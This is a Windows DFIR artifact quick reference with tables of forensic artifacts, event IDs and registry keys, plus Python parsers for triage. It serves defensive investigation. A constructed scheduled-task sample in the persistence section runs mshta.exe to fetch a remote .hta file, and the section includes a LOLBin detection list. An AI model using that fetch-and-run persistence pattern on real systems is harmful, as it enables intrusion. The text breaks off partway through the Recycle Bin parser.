DFIR Artifact Quick Reference
Audience: DFIR practitioners conducting Windows-centric incident response and forensic investigations.
Scope: Windows 10/11, Server 2016–2022 unless noted.
Legend: [EZ] = Eric Zimmerman tool | [TS] = Triaged from live system | [IMG] = Requires disk image
Table of Contents
- Execution Artifacts
- Persistence Mechanisms
- Account & Authentication Activity
- Lateral Movement Indicators
- File System & File Activity
- Network Activity
- Anti-Forensics & Defense Evasion
- Data Exfiltration Indicators
- Cloud & Browser Artifacts
- Key Event Log IDs Reference
- Critical Registry Keys Reference
- Recommended Toolchain
1. Execution Artifacts
Prefetch
| Property | Detail |
|---|---|
| Path | C:\Windows\Prefetch\*.pf |
| Exists on | Workstations (enabled by default); Servers (disabled by default) |
| Key Data | Executable name, run count, last 8 run timestamps, files/dirs referenced |
| Tool | PECmd.exe [EZ] |
| Investigative Value | Proves execution even if binary is deleted; timestamps survive binary removal |
| ATT&CK | T1204, T1059 |
Notes:
- Max 1024 entries (Win8+), FIFO eviction
- Hashes in filename are path + volume serial based — path changes = new hash
- svchost.exe may have multiple prefetch files for different -k arguments
ShimCache (AppCompatCache)
| Property | Detail |
|---|---|
| Registry Path | HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache |
| Key Data | Executable path, last modified time of binary, executed flag (Win7 only) |
| Tool | AppCompatCacheParser.exe [EZ] |
| Investigative Value | Records executables Windows has seen, regardless of whether they ran (Win8+) |
| ATT&CK | T1036, T1059 |
Notes:
- Win8/10+: Presence does NOT confirm execution — only that the file existed and metadata was touched
- Cache is written to registry at shutdown — live acquisition may miss last session entries
- Volatile: reboot can flush uncommitted entries
AmCache
| Property | Detail |
|---|---|
| Path | C:\Windows\AppCompat\Programs\Amcache.hve |
| Key Data | Full path, SHA1 hash of binary, first execution time, install date, publisher |
| Tool | AmcacheParser.exe [EZ] |
| Investigative Value | SHA1 hash available without running the binary — pivot to VirusTotal immediately |
| ATT&CK | T1204, T1027 |
Notes:
- Hive is locked on live system — parse from VSS copy or offline image
- Both ProgramEntries and UnassociatedFileEntries are investigatively valuable
- SHA1 is of the PE header; truncated hashes common for large binaries
BAM / DAM (Background Activity Moderator)
| Property | Detail |
|---|---|
| Registry Path | HKLM\SYSTEM\CurrentControlSet\Services\bam\State\UserSettings\{SID} |
| Key Data | Executable path, last execution time (UTC) per user SID |
| Tool | Registry Explorer [EZ], reg query [TS] |
| Investigative Value | Confirms execution per-user with timestamps; survives binary deletion |
| ATT&CK | T1204, T1059 |
Notes:
- Windows 10 v1709+ only
- Entries persist across reboots
- Directly attributes execution to specific user accounts by SID
UserAssist
| Property | Detail |
|---|---|
| Registry Path | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count |
| Key Data | ROT-13 encoded executable names, run count, last run timestamp |
| Tool | Registry Explorer [EZ] |
| Investigative Value | GUI-launched application history with run count + last execution time per user |
| ATT&CK | T1204.002 |
Notes:
- ROT-13 decode required on all entries
- Only tracks GUI-launched executables (not CLI-launched)
- Two GUIDs present: UEME_RUNPATH and UEME_RUNPIDL
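The ROT-13 decode and the binary layout of a Count value are easy to get wrong by hand, so here is an added parser (example code, not part of this reference and not one of the [EZ] tools) for the Windows 7+ 72-byte UserAssist value format. The offsets used (run count at 0x04, focus count at 0x08, focus time in milliseconds at 0x0C, last execution FILETIME at 0x3C) are the documented Win7+ layout; the sample entry is constructed, and `build_sample_entry` exists only to produce it.

```python
import codecs
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse of filetime_to_datetime; integer arithmetic avoids float rounding on large tick counts."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def decode_userassist_name(value_name: str) -> str:
    """UserAssist value names are ROT-13 encoded; digits and punctuation pass through unchanged."""
    return codecs.decode(value_name, "rot_13")


def parse_userassist_count(value_name: str, data: bytes) -> dict:
    """Parse one Windows 7+ UserAssist Count value (72-byte layout).

    Offsets: 0x04 run count, 0x08 focus count, 0x0C focus time (ms), 0x3C last execution FILETIME.
    The 16-byte XP layout is deliberately not handled.
    """
    if len(data) != 72:
        raise ValueError(f"unexpected UserAssist value length {len(data)} (Win7+ entries are 72 bytes)")
    run_count, focus_count, focus_time_ms = struct.unpack_from("<III", data, 4)
    last_run_ft = struct.unpack_from("<Q", data, 60)[0]
    return {
        "name": decode_userassist_name(value_name),
        "run_count": run_count,
        "focus_count": focus_count,
        "focus_time_ms": focus_time_ms,
        # A zero FILETIME means no last-run time was recorded for this entry
        "last_run": filetime_to_datetime(last_run_ft) if last_run_ft else None,
    }


def build_sample_entry(plain_name: str, run_count: int, last_run: datetime) -> tuple:
    """Construct a (value_name, data) pair the way Windows stores it. Sample data only."""
    buf = bytearray(72)
    struct.pack_into("<I", buf, 4, run_count)
    struct.pack_into("<Q", buf, 60, datetime_to_filetime(last_run))
    return codecs.encode(plain_name, "rot_13"), bytes(buf)


# Constructed sample: the System32 known-folder GUID prefix followed by the executable name
SAMPLE_NAME, SAMPLE_DATA = build_sample_entry(
    r"{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\cmd.exe",
    7,
    datetime(2024, 3, 1, 12, 0, 0, tzinfo=timezone.utc),
)

if __name__ == "__main__":
    print(SAMPLE_NAME)  # the ROT-13 form exactly as it appears under the Count key
    print(parse_userassist_count(SAMPLE_NAME, SAMPLE_DATA))
```

Note that the known-folder GUID is rotated along with the executable name, so every value name must be decoded before matching it against a path; the run count on Windows 7+ is the raw value (no offset applied).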
Jump Lists
| Property | Detail |
|---|---|
| Path | %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations\ and CustomDestinations\ |
| Key Data | Recently opened files per application (AppID), timestamps, file paths |
| Tool | JLECmd.exe [EZ] |
| Investigative Value | Files opened via specific applications; persists after target file deletion |
| ATT&CK | T1204.002, T1566.001 |
2. Persistence Mechanisms
Run Keys
| Registry Path | Scope |
|---|---|
| HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Current user, every logon |
| HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | Current user, once |
| HKLM\Software\Microsoft\Windows\CurrentVersion\Run | All users, every logon |
| HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | All users, once |
Tool: Registry Explorer [EZ], Autoruns (Sysinternals) | ATT&CK: T1547.001
Scheduled Tasks
| Property | Detail |
|---|---|
| Path (XML) | C:\Windows\System32\Tasks\ |
| Registry Path | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks |
| Key Data | Task name, triggers, actions (command + args), author, creation/modification times |
| Tool | SchtasksParser.exe [EZ], manual XML review |
| Event IDs | 4698 (Created), 4702 (Updated), 4700/4701 (Enabled/Disabled) |
| ATT&CK | T1053.005 |
Notes:
- Deleted task XML may persist in registry under TaskCache
- Compare filesystem vs. registry — discrepancy indicates tampering
- Action fields often expose full command line including LOLBin abuse
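To show what the manual XML review above actually looks for, here is an added parser (example code, not part of this reference and not SchtasksParser) for the task XML schema under C:\Windows\System32\Tasks\, plus the filesystem-versus-TaskCache comparison from the notes. The suspicion checks (action runs one of the LOLBins listed later in this reference, arguments contain a URL, task is marked Hidden) are this example's own choices, and both sample tasks are constructed. Real task files are UTF-16 with a BOM; pass their raw bytes to `parse_task_xml` and ElementTree will honour the declaration.

```python
import ntpath
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Binaries from the LOLBin reference section of this page
LOLBINS = {"certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "wscript.exe", "cscript.exe",
           "powershell.exe", "msiexec.exe", "bitsadmin.exe", "wmic.exe", "msbuild.exe"}


def parse_task_xml(xml_data) -> dict:
    """Extract the investigatively useful fields from a Task Scheduler XML definition."""
    root = ET.fromstring(xml_data)

    def text(path: str) -> str:
        return (root.findtext(path, default="", namespaces=TASK_NS) or "").strip()

    actions = []
    for exec_node in root.findall("t:Actions/t:Exec", TASK_NS):
        cmd = (exec_node.findtext("t:Command", default="", namespaces=TASK_NS) or "").strip()
        args = (exec_node.findtext("t:Arguments", default="", namespaces=TASK_NS) or "").strip()
        actions.append((cmd, args))
    # Trigger element names (LogonTrigger, CalendarTrigger, BootTrigger, ...) without the namespace
    triggers = [child.tag.split("}", 1)[1] for child in root.findall("t:Triggers/*", TASK_NS)]
    return {
        "author": text("t:RegistrationInfo/t:Author"),
        "created": text("t:RegistrationInfo/t:Date"),
        "run_as": text("t:Principals/t:Principal/t:UserId"),
        "hidden": text("t:Settings/t:Hidden").lower() == "true",
        "triggers": triggers,
        "actions": actions,
    }


def task_findings(task: dict) -> list:
    """Heuristic review of a parsed task; thresholds and checks are this example's assumptions."""
    findings = []
    for cmd, args in task["actions"]:
        exe = ntpath.basename(cmd.strip('"')).lower()
        if exe in LOLBINS:
            findings.append(f"action runs LOLBin {exe}")
        if re.search(r"https?://", args, re.IGNORECASE):
            findings.append("action arguments contain a URL")
    if task["hidden"]:
        findings.append("task is marked Hidden")
    return findings


def compare_task_sources(filesystem_tasks, registry_tasks) -> dict:
    """Tasks present in TaskCache but not on disk (or vice versa) point at deletion or tampering."""
    fs, reg = set(filesystem_tasks), set(registry_tasks)
    return {"registry_only": sorted(reg - fs), "filesystem_only": sorted(fs - reg)}


# Constructed samples (the declaration line is omitted because these are in-memory str objects)
SUSPICIOUS_TASK = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Date>2024-04-10T03:12:44</Date><Author>CORP\\jdoe</Author></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>mshta.exe</Command>
    <Arguments>http://203.0.113.10/update.hta</Arguments></Exec></Actions>
</Task>"""

BENIGN_TASK = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Date>2023-11-02T09:00:00</Date><Author>Vendor</Author></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2023-11-02T09:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>"C:\\Program Files\\Vendor\\Updater.exe"</Command>
    <Arguments>/check</Arguments></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for xml_text in (SUSPICIOUS_TASK, BENIGN_TASK):
        task = parse_task_xml(xml_text)
        print(task["author"], task["triggers"], task["actions"], task_findings(task))
```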
Services
| Property | Detail |
|---|---|
| Registry Path | HKLM\SYSTEM\CurrentControlSet\Services\ |
| Key Data | ImagePath, Start type, DisplayName, Description |
| Event IDs | 7045 (New Service), 7034/7035/7036 (State changes) |
| Tool | Registry Explorer [EZ], sc query [TS] |
| ATT&CK | T1543.003 |
Notes:
- ImagePath pointing to Temp, AppData, or ProgramData = high suspicion
- Services with no Description or generic names are a common malware indicator
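Applying the two notes above across a dumped Services key means first normalising the ImagePath value, which arrives quoted, unquoted with arguments, with %SystemRoot%-style variables, or as a \SystemRoot\ or bare system32\ driver path. The following is an added example (not part of this reference and not one of the [EZ] tools) that does that normalisation and then applies the page's two checks. The environment-variable map assumes a default C:\Windows install, and the four sample services are constructed.

```python
import re

# Assumption: default install paths; take the real values from the SYSTEM hive of the case system
ENV_MAP = {
    "%systemroot%": "C:\\Windows",
    "%windir%": "C:\\Windows",
    "%programfiles%": "C:\\Program Files",
    "%programdata%": "C:\\ProgramData",
}
# Directories named on this page as high-suspicion service binary locations
SUSPICIOUS_DIRS = ("\\temp\\", "\\appdata\\", "\\programdata\\")


def expand_image_path(image_path: str) -> str:
    """Resolve the path forms the Service Control Manager accepts into a plain absolute path."""
    p = image_path.strip()
    for var, value in ENV_MAP.items():
        p = re.sub(re.escape(var), lambda _m, v=value: v, p, flags=re.IGNORECASE)
    if p.startswith("\\??\\"):                      # NT object-manager prefix
        p = p[4:]
    if p.lower().startswith("\\systemroot\\"):      # common for drivers
        p = "C:\\Windows" + p[len("\\systemroot"):]
    if p.lower().startswith("system32\\"):          # relative to the Windows directory
        p = "C:\\Windows\\" + p
    return p


def extract_binary(image_path: str) -> str:
    """Return just the executable from an ImagePath, dropping service arguments such as -k netsvcs."""
    p = expand_image_path(image_path)
    if p.startswith('"'):
        end = p.find('"', 1)
        return p[1:end] if end > 0 else p[1:]
    m = re.match(r"(.+?\.(?:exe|sys|dll))(?:\s|$)", p, re.IGNORECASE)
    return m.group(1) if m else p.split(" ", 1)[0]


def assess_service(name: str, image_path: str, description: str) -> dict:
    """Apply the two checks from this page: staging-directory binary and missing Description."""
    binary = extract_binary(image_path)
    findings = []
    lowered = binary.lower()
    for d in SUSPICIOUS_DIRS:
        if d in lowered:
            findings.append(f"binary {binary} lives under {d.strip(chr(92))}")
            break
    if not description.strip():
        findings.append("service has no Description")
    return {"service": name, "binary": binary, "findings": findings}


def triage_services(services) -> list:
    return [assess_service(name, image_path, desc) for name, image_path, desc in services]


# Constructed sample rows as (ServiceName, ImagePath, Description)
SAMPLE_SERVICES = [
    ("Spooler", r"%SystemRoot%\System32\spoolsv.exe", "Print Spooler"),
    ("disk", r"\SystemRoot\System32\drivers\disk.sys", "Disk Driver"),
    ("wuauservx", r"C:\ProgramData\wuauservx\wuauservx.exe -svc", ""),
    ("UpdaterSvc", r'"C:\Users\bob\AppData\Roaming\upd\svc.exe" -start', ""),
]

if __name__ == "__main__":
    for result in triage_services(SAMPLE_SERVICES):
        print(result)
```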
WMI Subscriptions
| Property | Detail |
|---|---|
| Path | C:\Windows\System32\wbem\Repository\ |
| Key Data | EventFilter, EventConsumer, FilterToConsumerBinding |
| Tool | PyWMIPersistenceFinder.py, WMI Explorer |
| ATT&CK | T1546.003 |
Notes:
- No binary on disk required (script consumer) — extremely stealthy
- Repository is binary format requiring specialized tooling
- Check for CommandLineEventConsumer and ActiveScriptEventConsumer types
Startup Folders
| Path | Scope |
|---|---|
| %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ | Current user |
| C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ | All users |
ATT&CK: T1547.001
3. Account & Authentication Activity
Key Security Event IDs
| Event ID | Description | Log |
|---|---|---|
| 4624 | Successful logon | Security |
| 4625 | Failed logon | Security |
| 4634 / 4647 | Logoff | Security |
| 4648 | Explicit credential logon (RunAs, PTH indicator) | Security |
| 4672 | Special privileges assigned (admin logon) | Security |
| 4720 | User account created | Security |
| 4726 | User account deleted | Security |
| 4728 / 4732 / 4756 | Member added to security/local/universal group | Security |
| 4771 | Kerberos pre-auth failed | Security (DC) |
| 4776 | NTLM auth attempt | Security (DC) |
| 4768 | TGT requested | Security (DC) |
| 4769 | Service ticket requested | Security (DC) |
Logon Type Reference
| Type | Description | Attack Relevance |
|---|---|---|
| 2 | Interactive (console) | Local access |
| 3 | Network | SMB, net use, lateral movement |
| 4 | Batch | Scheduled task execution |
| 5 | Service | Service account logon |
| 7 | Unlock | Workstation unlock |
| 8 | NetworkCleartext | WinRM, IIS basic auth — credential exposure risk |
| 9 | NewCredentials | RunAs /netonly — PTH indicator |
| 10 | RemoteInteractive | RDP |
| 11 | CachedInteractive | Offline / cached credential use |
SAM Database
| Property | Detail |
|---|---|
| Path | C:\Windows\System32\config\SAM |
| Key Data | Local accounts, NTLM hashes, account flags, last logon |
| Tool | Registry Explorer [EZ] with SYSTEM hive for decryption |
| ATT&CK | T1003.002 |
4. Lateral Movement Indicators
RDP
| Artifact | Location | Key Data |
|---|---|---|
| Event ID 4624 (Type 10) | Security.evtx | Source IP, username |
| Event ID 1149 | TerminalServices-RemoteConnectionManager%4Operational.evtx | Source IP, username (pre-auth) |
| Event ID 21, 25 | TerminalServices-LocalSessionManager%4Operational.evtx | Session logon/reconnect |
| Bitmap Cache | %LOCALAPPDATA%\Microsoft\Terminal Server Client\Cache\ | Pixel fragments of remote session |
| MRU Registry | HKCU\Software\Microsoft\Terminal Server Client\Default | Recently connected RDP hosts |
SMB / Admin Shares
| Artifact | Location | Key Data |
|---|---|---|
| Event ID 4624 (Type 3) | Security.evtx | Network logon from remote host |
| Event ID 5140 | Security.evtx | Network share accessed |
| Event ID 5145 | Security.evtx | Share object access check |
| Named Pipes | Sysmon Event ID 17/18 | PsExec, Cobalt Strike SMB beacons |
PsExec
| Artifact | Location |
|---|---|
| Service creation | System.evtx Event ID 7045 (PSEXESVC) |
| Prefetch | PSEXESVC.EXE-*.pf on target host |
| Registry | HKLM\SYSTEM\CurrentControlSet\Services\PSEXESVC |
| Sequential logon events | Event ID 4624 Type 3 followed by Type 2, same source |
WMI Remote Execution
| Artifact | Location | Key Data |
|---|---|---|
| Event ID 4624 Type 3 | Security.evtx | Source IP |
| WMI Activity Log | Microsoft-Windows-WMI-Activity%4Operational.evtx | Process creation, query execution |
| Sysmon Event ID 19/20/21 | Sysmon.evtx | Filter/consumer activity |
| wmiprvse.exe child processes | Prefetch, Sysmon Event ID 1 | Spawned command execution |
Pass-the-Hash / Pass-the-Ticket Indicators
| Indicator | Detail |
|---|---|
| Event ID 4624 Logon Type 9 | NewCredentials — explicit credential use |
| Event ID 4648 | Logon with explicit credentials |
| Event ID 4769 with RC4 encryption | Downgrade attack / Kerberoasting indicator |
| Source workstation mismatch | Lateral movement pivot |
| Event ID 4769 from non-domain-joined host | Golden/Silver Ticket activity |
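The Logon Type reference in section 3 and the indicator table above both come down to reading the EventData of a 4624 record and applying a few rules. Here is an added example (not part of this reference) that parses 4624 events in the standard Windows event XML format, classifies the logon type, and raises the Type 9, Type 10, Type 8, NTLM Type 3 and source-workstation-mismatch indicators. The asset inventory used for the mismatch check, the four sample events and the `sample_event` builder are constructed for this example.

```python
import xml.etree.ElementTree as ET

EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

LOGON_TYPES = {2: "Interactive", 3: "Network", 4: "Batch", 5: "Service", 7: "Unlock",
               8: "NetworkCleartext", 9: "NewCredentials", 10: "RemoteInteractive", 11: "CachedInteractive"}


def parse_4624(xml_text) -> dict:
    """Pull the fields this page's logon-type and PTH tables rely on out of a 4624 event."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("e:System/e:EventID", namespaces=EVT_NS))
    if event_id != 4624:
        raise ValueError(f"expected Event ID 4624, got {event_id}")
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", EVT_NS)}
    return {
        "time": root.find("e:System/e:TimeCreated", EVT_NS).get("SystemTime"),
        "computer": root.findtext("e:System/e:Computer", namespaces=EVT_NS),
        "user": f"{data.get('TargetDomainName', '')}\\{data.get('TargetUserName', '')}",
        "logon_type": int(data.get("LogonType", "0")),
        "auth_package": data.get("AuthenticationPackageName", ""),
        "logon_process": data.get("LogonProcessName", "").strip(),
        "workstation": data.get("WorkstationName", ""),
        "ip": data.get("IpAddress", ""),
    }


def triage_logon(ev: dict, inventory: dict) -> list:
    """inventory maps source IP -> expected hostname (a constructed asset list for this example)."""
    lt = ev["logon_type"]
    flags = []
    if lt == 9:
        flags.append("Type 9 NewCredentials: explicit alternate credentials (runas /netonly); PTH indicator")
    elif lt == 10:
        flags.append(f"Type 10 RemoteInteractive: RDP session from {ev['ip']} ({ev['workstation']})")
    elif lt == 8:
        flags.append("Type 8 NetworkCleartext: credentials exposed in cleartext on the wire")
    elif lt == 3 and ev["auth_package"] == "NTLM":
        flags.append(f"Type 3 NTLM network logon from {ev['ip']}: review for lateral movement")
    expected = inventory.get(ev["ip"])
    if expected and ev["workstation"] and expected.upper() != ev["workstation"].upper():
        flags.append(f"source workstation mismatch: {ev['ip']} is {expected} in inventory, "
                     f"event reports {ev['workstation']}")
    return flags


def triage_events(xml_events, inventory: dict) -> list:
    """Return (user, logon type name, flags) for every event that raised at least one flag."""
    out = []
    for xml_text in xml_events:
        ev = parse_4624(xml_text)
        flags = triage_logon(ev, inventory)
        if flags:
            out.append((ev["user"], LOGON_TYPES.get(ev["logon_type"], "Unknown"), flags))
    return out


def sample_event(logon_type, user, ip, workstation, auth="Kerberos", process="Kerberos") -> str:
    """Constructed 4624 event in the schema Windows writes to Security.evtx."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4624</EventID><TimeCreated SystemTime="2024-05-02T09:15:01.000000Z"/>
    <Computer>FS01.corp.example</Computer></System>
  <EventData>
    <Data Name="TargetUserName">{user}</Data><Data Name="TargetDomainName">CORP</Data>
    <Data Name="LogonType">{logon_type}</Data><Data Name="LogonProcessName">{process}</Data>
    <Data Name="AuthenticationPackageName">{auth}</Data><Data Name="WorkstationName">{workstation}</Data>
    <Data Name="IpAddress">{ip}</Data>
  </EventData>
</Event>"""


INVENTORY = {"10.0.0.5": "WS01", "10.0.0.7": "WS02"}   # constructed
SAMPLE_EVENTS = [
    sample_event(2, "alice", "-", "FS01"),                                        # console logon
    sample_event(10, "bob", "10.0.0.5", "WS01"),                                  # RDP, inventory agrees
    sample_event(9, "bob", "-", "FS01", auth="Negotiate", process="seclogo"),     # runas /netonly
    sample_event(3, "admin", "10.0.0.7", "WIN-XYZ12", auth="NTLM", process="NtLmSsp"),  # mismatch
]

if __name__ == "__main__":
    for user, kind, flags in triage_events(SAMPLE_EVENTS, INVENTORY):
        print(user, kind, flags)
```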
5. File System & File Activity
MFT (Master File Table)
| Property | Detail |
|---|---|
| Path | $MFT at NTFS volume root |
| Key Data | All file metadata: $STANDARD_INFO and $FILE_NAME timestamps, size, parent directory |
| Tool | MFTECmd.exe [EZ] |
| Investigative Value | Timestomping detection; file recovery; full volume enumeration |
| ATT&CK | T1070.006 |
Timestomping Detection:
- $STANDARD_INFORMATION ($SI) timestamps are user-modifiable via API
- $FILE_NAME ($FN) timestamps are kernel-set — much harder to manipulate
- $SI Creation time AFTER $FN Creation time = strong timestomping indicator
- $SI with no subsecond precision = likely set by an external tool, not Windows
LNK Files (Shortcut Files)
| Property | Detail |
|---|---|
| Path | %APPDATA%\Microsoft\Windows\Recent\ |
| Key Data | Target file path, target MAC times, volume serial, machine ID, NetBIOS name |
| Tool | LECmd.exe [EZ] |
| Investigative Value | Proves file was opened; machine ID links artifact to specific host; persists after target deletion |
| ATT&CK | T1547.009 |
Shellbags
| Property | Detail |
|---|---|
| Registry Path | HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU |
| Key Data | Folder paths browsed via Explorer, timestamps, network paths, removable media paths |
| Tool | SBECmd.exe [EZ] |
| Investigative Value | Proves user navigated a directory even if it no longer exists; tracks removable media access |
| ATT&CK | T1025, T1074 |
Volume Shadow Copies
| Property | Detail |
|---|---|
| Command | vssadmin list shadows [TS] |
| Investigative Value | Access historical versions of locked files: SAM, NTDS.dit, registry hives |
| Tool | vshadow.exe, Arsenal Image Mounter |
| ATT&CK | T1490 — VSS deletion = ransomware precursor indicator |
$LogFile and $UsnJrnl
| Artifact | Detail |
|---|---|
| $LogFile | NTFS transaction log — recent file operations; useful for post-deletion recovery |
| $UsnJrnl:$J | Change journal — all create/modify/delete/rename ops with timestamps |
| Tool | MFTECmd.exe [EZ] for $J; fsutil usn [TS] |
| Investigative Value | Rename chains (unpacking activity), staging evidence, deleted file confirmation |
6. Network Activity
DNS Cache (Live)
| Property | Detail |
|---|---|
| Command | ipconfig /displaydns [TS] |
| Key Data | Recently resolved hostnames and IPs |
| Investigative Value | C2 domain resolution evidence — volatile, lost on flush/reboot |
Active Connections (Live)
| Command | Output |
|---|---|
| netstat -anob | Connections with PID and binary name |
| Get-NetTCPConnection | PowerShell equivalent with richer output |
Windows Firewall Logs
| Property | Detail |
|---|---|
| Path | C:\Windows\System32\LogFiles\Firewall\pfirewall.log |
| Key Data | Allow/drop, source/dest IP, port, protocol, direction |
| Investigative Value | Egress traffic patterns, port scanning, lateral movement paths |
Sysmon Network Events
| Event ID | Description |
|---|---|
| 3 | Network connection (process, src/dst IP/port, DNS name if resolved) |
| 22 | DNS query (process + queried domain) |
PCAP Behavioral Indicators
| Pattern | Indicator |
|---|---|
| Regular beaconing (low jitter intervals) | C2 heartbeat |
| DNS queries with high-entropy subdomains | DNS tunneling (C2 or exfil) |
| Large outbound transfers during off-hours | Data exfiltration |
| JA3/JA3S fingerprint mismatch for known app | Malware using TLS |
| HTTP POST to bare IP address (no domain) | C2 over HTTP |
| Long-duration low-bandwidth sessions | Interactive C2 |
| Abnormal User-Agent strings | Malware HTTP C2 |
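Two of the patterns above, regular beaconing and high-entropy DNS labels, can be scored from a connection log or a DNS query list without touching the PCAP itself. This added example (not part of this reference) measures beaconing as the coefficient of variation of inter-connection intervals per destination and scores the leftmost DNS label with Shannon entropy. The thresholds (six connections, CV of 0.1, label length 16, entropy 3.5) are starting points assumed for the example, not tuned values, and the connection records and query names are constructed using RFC 5737 documentation addresses.

```python
import math
import statistics
from collections import Counter, defaultdict


def shannon_entropy(text: str) -> float:
    """Bits per character; random-looking tunnelling labels score well above natural hostnames."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def find_beacons(connections, min_connections=6, max_cv=0.1) -> list:
    """connections: iterable of (epoch_seconds, src_ip, dst_ip, dst_port).

    Groups by destination and flags groups whose intervals have stdev/mean <= max_cv,
    i.e. low jitter. Threshold values are assumptions of this example.
    """
    per_dst = defaultdict(list)
    for ts, _src, dst, port in connections:
        per_dst[(dst, port)].append(ts)
    hits = []
    for (dst, port), stamps in per_dst.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        intervals = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        mean = statistics.mean(intervals)
        if mean <= 0:
            continue
        cv = statistics.pstdev(intervals) / mean
        if cv <= max_cv:
            hits.append({"dst": dst, "port": port, "count": len(stamps),
                         "mean_interval_s": round(mean, 1), "jitter_cv": round(cv, 3)})
    return hits


def suspicious_dns_queries(queries, min_label_len=16, min_entropy=3.5) -> list:
    """Flag query names whose leftmost label is both long and high-entropy."""
    hits = []
    for qname in queries:
        label = qname.split(".", 1)[0]
        ent = shannon_entropy(label)
        if len(label) >= min_label_len and ent >= min_entropy:
            hits.append((qname, round(ent, 2)))
    return hits


def build_sample_connections() -> list:
    """Constructed log: one host beaconing every ~60 s to 203.0.113.10 and browsing 198.51.100.20."""
    base = 1_714_640_000
    conns = []
    t = base
    conns.append((t, "10.0.0.15", "203.0.113.10", 443))
    for gap in (60, 58, 61, 59, 60, 62, 60, 59, 61):   # small jitter around 60 s
        t += gap
        conns.append((t, "10.0.0.15", "203.0.113.10", 443))
    t = base
    conns.append((t, "10.0.0.15", "198.51.100.20", 443))
    for gap in (5, 130, 12, 400, 7, 90):               # human-driven, irregular
        t += gap
        conns.append((t, "10.0.0.15", "198.51.100.20", 443))
    return conns


SAMPLE_DNS = ["www.example.com", "a8f3k2j9x0q1z7m4w6e5r2t8y1u3.tunnel.example", "mail.example.com"]

if __name__ == "__main__":
    print(find_beacons(build_sample_connections()))
    print(suspicious_dns_queries(SAMPLE_DNS))
```

Long-lived implants often add deliberate jitter, so treat a raised CV threshold and a longer observation window as the knobs to turn when the sixty-second heartbeat in the sample is not what the environment shows.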
7. Anti-Forensics & Defense Evasion
Event Log Clearing
| Indicator | Detail |
|---|---|
| Event ID 1102 | Security log cleared |
| Event ID 104 | System log cleared |
| Log timestamp gaps | Selective event deletion |
| Sysmon Event ID 255 | Sysmon service error (tamper indicator) |
| ATT&CK | T1070.001 |
Timestomping
| Indicator | Detail |
|---|---|
| $SI vs $FN creation time discrepancy | MFT parsing required |
| PE compile timestamp at epoch or future date | PEStudio, exiftool analysis |
| ATT&CK | T1070.006 |
File Deletion & Recycle Bin
| Artifact | Detail |
|---|---|
| $I + $R file pairs | $I = metadata (original path, deletion time, file size); $R = content |
| Path | C:\$Recycle.Bin\{SID}\ |
| Tool | RBCmd.exe [EZ] |
| ATT&CK | T1070.004 |
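The $I metadata file is small enough to parse by hand, which is useful when RBCmd is not available on an examination host. This is an added example (not part of this reference and not RBCmd) for both on-disk formats: version 1 (Vista through 8.1) with a fixed 520-byte path field, and version 2 (Windows 10 and later) with a character-count-prefixed path. The sample files are constructed by `build_sample_i_file`, which exists only to produce test data.

```python
import ntpath
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def parse_i_file(data: bytes) -> dict:
    r"""Parse a $I<suffix> file from C:\$Recycle.Bin\{SID}\.

    Little-endian layout: 0x00 version (8 bytes), 0x08 original size (8), 0x10 deletion FILETIME (8),
    then the original path: v1 = fixed 520-byte UTF-16LE field, v2 = 4-byte character count
    (including the terminating NUL) followed by that many UTF-16LE characters.
    """
    if len(data) < 24:
        raise ValueError("truncated $I file")
    version, size, deleted_ft = struct.unpack_from("<QQQ", data, 0)
    if version == 1:
        path = data[24:24 + 520].decode("utf-16-le").split("\x00", 1)[0]
    elif version == 2:
        nchars = struct.unpack_from("<I", data, 24)[0]
        path = data[28:28 + nchars * 2].decode("utf-16-le").rstrip("\x00")
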